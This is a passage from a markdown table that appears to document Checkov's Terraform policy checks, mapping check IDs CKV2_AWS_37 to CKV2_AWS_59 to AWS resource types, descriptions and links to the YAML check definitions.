[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1402 | CKV2_AWS_37 | resource | aws_transfer_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1403 | CKV2_AWS_37 | resource | aws_transfer_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1404 | CKV2_AWS_37 | resource | aws_transfer_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1405 | CKV2_AWS_37 | resource | aws_volume_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1406 | CKV2_AWS_37 | resource | aws_vpc | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1407 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1408 | CKV2_AWS_37 | resource | aws_vpc_dhcp_options_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1409 | CKV2_AWS_37 | resource | aws_vpc_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1410 | CKV2_AWS_37 | resource | aws_vpc_endpoint_connection_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1411 | CKV2_AWS_37 | resource | aws_vpc_endpoint_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1412 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1413 | CKV2_AWS_37 | resource | aws_vpc_endpoint_service_allowed_principal | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1414 | CKV2_AWS_37 | resource | aws_vpc_endpoint_subnet_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1415 | CKV2_AWS_37 | resource | aws_vpc_ipv4_cidr_block_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1416 | CKV2_AWS_37 | resource | aws_vpc_peering_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1417 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1418 | CKV2_AWS_37 | resource | aws_vpc_peering_connection_options | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1419 | CKV2_AWS_37 | resource | aws_vpn_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1420 | CKV2_AWS_37 | resource | aws_vpn_connection_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1421 | CKV2_AWS_37 | resource | aws_vpn_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1422 | CKV2_AWS_37 | resource | aws_vpn_gateway_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1423 | CKV2_AWS_37 | resource | aws_vpn_gateway_route_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1424 | CKV2_AWS_37 | resource | aws_waf_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1425 | CKV2_AWS_37 | resource | aws_waf_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1426 | CKV2_AWS_37 | resource | aws_waf_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1427 | CKV2_AWS_37 | resource | aws_waf_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1428 | CKV2_AWS_37 | resource | aws_waf_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1429 | CKV2_AWS_37 | resource | aws_waf_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1430 | CKV2_AWS_37 | resource | aws_waf_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1431 | CKV2_AWS_37 | resource | aws_waf_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1432 | CKV2_AWS_37 | resource | aws_waf_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1433 | CKV2_AWS_37 | resource | aws_waf_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1434 | CKV2_AWS_37 | resource | aws_waf_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1435 | CKV2_AWS_37 | resource | aws_waf_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1436 | CKV2_AWS_37 | resource | aws_wafregional_byte_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1437 | CKV2_AWS_37 | resource | aws_wafregional_geo_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1438 | CKV2_AWS_37 | resource | aws_wafregional_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1439 | CKV2_AWS_37 | resource | aws_wafregional_rate_based_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1440 | CKV2_AWS_37 | resource | aws_wafregional_regex_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1441 | CKV2_AWS_37 | resource | aws_wafregional_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1442 | CKV2_AWS_37 | resource | aws_wafregional_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1443 | CKV2_AWS_37 | resource | aws_wafregional_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1444 | CKV2_AWS_37 | resource | aws_wafregional_size_constraint_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1445 | CKV2_AWS_37 | resource | aws_wafregional_sql_injection_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1446 | CKV2_AWS_37 | resource | aws_wafregional_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1447 | CKV2_AWS_37 | resource | aws_wafregional_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1448 | CKV2_AWS_37 | resource | aws_wafregional_xss_match_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1449 | CKV2_AWS_37 | resource | aws_wafv2_ip_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1450 | CKV2_AWS_37 | resource | aws_wafv2_regex_pattern_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1451 | CKV2_AWS_37 | resource | aws_wafv2_rule_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1452 | CKV2_AWS_37 | resource | aws_wafv2_web_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1453 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1454 | CKV2_AWS_37 | resource | aws_wafv2_web_acl_logging_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1455 | CKV2_AWS_37 | resource | aws_worklink_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1456 | CKV2_AWS_37 | resource | aws_worklink_website_certificate_authority_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1457 | CKV2_AWS_37 | resource | aws_workspaces_directory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1458 | CKV2_AWS_37 | resource | aws_workspaces_ip_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1459 | CKV2_AWS_37 | resource | aws_workspaces_workspace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1460 | CKV2_AWS_37 | resource | aws_xray_sampling_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1461 | CKV2_AWS_38 | resource | aws_route53_zone | Ensure Domain Name System Security Extensions (DNSSEC) signing is enabled for Amazon Route 53 public hosted zones | Terraform | [Route53ZoneEnableDNSSECSigning.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneEnableDNSSECSigning.yaml) | -| 1462 | CKV2_AWS_39 | resource | aws_route53_zone | Ensure Domain Name System (DNS) query logging is enabled for Amazon Route 53 hosted zones | Terraform | [Route53ZoneHasMatchingQueryLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ZoneHasMatchingQueryLog.yaml) | -| 1463 | CKV2_AWS_40 | resource | aws_iam_group_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1464 | CKV2_AWS_40 | resource | aws_iam_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1465 | CKV2_AWS_40 | resource | aws_iam_role_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1466 | CKV2_AWS_40 | resource | aws_iam_user_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1467 | CKV2_AWS_40 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1468 | CKV2_AWS_40 | resource | data.aws_iam_policy_document | Ensure AWS IAM policy does not allow full IAM privileges | Terraform | [IAMPolicyNotAllowFullIAMAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMPolicyNotAllowFullIAMAccess.yaml) | -| 1469 | CKV2_AWS_41 | resource | aws_instance | Ensure an IAM role is attached to EC2 instance | Terraform | [EC2InstanceHasIAMRoleAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EC2InstanceHasIAMRoleAttached.yaml) | -| 1470 | CKV2_AWS_42 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution uses custom SSL certificate | Terraform | [CloudFrontHasCustomSSLCertificate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasCustomSSLCertificate.yaml) | -| 1471 | CKV2_AWS_43 | resource | aws_s3_bucket_acl | Ensure S3 Bucket does not allow access to all Authenticated users | Terraform | [S3NotAllowAccessToAllAuthenticatedUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3NotAllowAccessToAllAuthenticatedUsers.yaml) | -| 1472 | CKV2_AWS_44 | resource | aws_route | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1473 | CKV2_AWS_44 | resource | aws_route_table | Ensure AWS route table with VPC peering does not contain routes overly permissive to all traffic | Terraform | [VPCPeeringRouteTableOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml) | -| 1474 | CKV2_AWS_45 | resource | aws_config_configuration_recorder | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1475 | CKV2_AWS_45 | resource | aws_config_configuration_recorder_status | Ensure AWS Config recorder is enabled to record all supported resources | Terraform | [AWSConfigRecorderEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSConfigRecorderEnabled.yaml) | -| 1476 | CKV2_AWS_46 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront Distribution with S3 have Origin Access set to enabled | Terraform | [CLoudFrontS3OriginConfigWithOAI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CLoudFrontS3OriginConfigWithOAI.yaml) | -| 1477 | CKV2_AWS_47 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | -| 1478 | CKV2_AWS_47 | resource | aws_wafv2_web_acl | Ensure AWS CloudFront attached WAFv2 WebACL is configured with AMR for Log4j Vulnerability | Terraform | [CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontWebACLConfiguredWIthLog4jVulnerability.yaml) | -| 1479 | CKV2_AWS_48 | resource | aws_config_configuration_recorder | Ensure AWS Config must record all possible resources | Terraform | [ConfigRecorderRecordsAllGlobalResources.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ConfigRecorderRecordsAllGlobalResources.yaml) | -| 1480 | CKV2_AWS_49 | resource | aws_dms_endpoint | Ensure AWS Database Migration Service endpoints have SSL configured | Terraform | [DMSEndpointHaveSSLConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/DMSEndpointHaveSSLConfigured.yaml) | -| 1481 | CKV2_AWS_50 | resource | aws_elasticache_replication_group | Ensure AWS ElastiCache Redis cluster with Multi-AZ Automatic Failover feature set to enabled | Terraform | [ElastiCacheRedisConfiguredAutomaticFailOver.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElastiCacheRedisConfiguredAutomaticFailOver.yaml) | -| 1482 | CKV2_AWS_51 | resource | aws_api_gateway_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1483 | CKV2_AWS_51 | resource | aws_apigatewayv2_api | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1484 | CKV2_AWS_51 | resource | aws_apigatewayv2_stage | Ensure AWS API Gateway endpoints uses client certificate authentication | Terraform | [APIGatewayEndpointsUsesCertificateForAuthentication.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayEndpointsUsesCertificateForAuthentication.yaml) | -| 1485 | CKV2_AWS_52 | resource | aws_elasticsearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | -| 1486 | CKV2_AWS_52 | resource | aws_opensearch_domain | Ensure AWS ElasticSearch/OpenSearch Fine-grained access control is enabled | Terraform | [OpenSearchDomainHasFineGrainedControl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/OpenSearchDomainHasFineGrainedControl.yaml) | -| 1487 | CKV2_AWS_53 | resource | aws_api_gateway_method | Ensure AWS API gateway request is validated | Terraform | [APIGatewayRequestParameterValidationEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGatewayRequestParameterValidationEnabled.yaml) | -| 1488 | CKV2_AWS_54 | resource | aws_cloudfront_distribution | Ensure AWS CloudFront distribution is using secure SSL protocols for HTTPS communication | Terraform | [CloudFrontUsesSecureProtocolsForHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontUsesSecureProtocolsForHTTPS.yaml) | -| 1489 | CKV2_AWS_55 | resource | aws_emr_cluster | Ensure AWS EMR cluster is configured with security configuration | Terraform | [EMRClusterHasSecurityConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EMRClusterHasSecurityConfiguration.yaml) | -| 1490 | CKV2_AWS_56 | resource | aws_iam_group_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1491 | CKV2_AWS_56 | resource | aws_iam_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1492 | CKV2_AWS_56 | resource | aws_iam_role | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1493 | CKV2_AWS_56 | resource | aws_iam_role_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1494 | CKV2_AWS_56 | resource | aws_iam_user_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1495 | CKV2_AWS_56 | resource | aws_ssoadmin_managed_policy_attachment | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1496 | CKV2_AWS_56 | resource | data.aws_iam_policy | Ensure AWS Managed IAMFullAccess IAM policy is not used. | Terraform | [IAMManagedIAMFullAccessPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMManagedIAMFullAccessPolicy.yaml) | -| 1497 | CKV2_AWS_57 | resource | aws_secretsmanager_secret | Ensure Secrets Manager secrets should have automatic rotation enabled | Terraform | [SecretsAreRotated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SecretsAreRotated.yaml) | -| 1498 | CKV2_AWS_58 | resource | aws_neptune_cluster | Ensure AWS Neptune cluster deletion protection is enabled | Terraform | [NeptuneDeletionProtectionEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/NeptuneDeletionProtectionEnabled.yaml) | -| 1499 | CKV2_AWS_59 | resource | aws_elasticsearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | [ElasticSearchDedicatedMasterEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ElasticSearchDedicatedMasterEnabled.yaml) | -| 1500 | CKV2_AWS_59 | resource | aws_opensearch_domain | Ensure ElasticSearch/OpenSearch has dedicated master node enabled | Terraform | 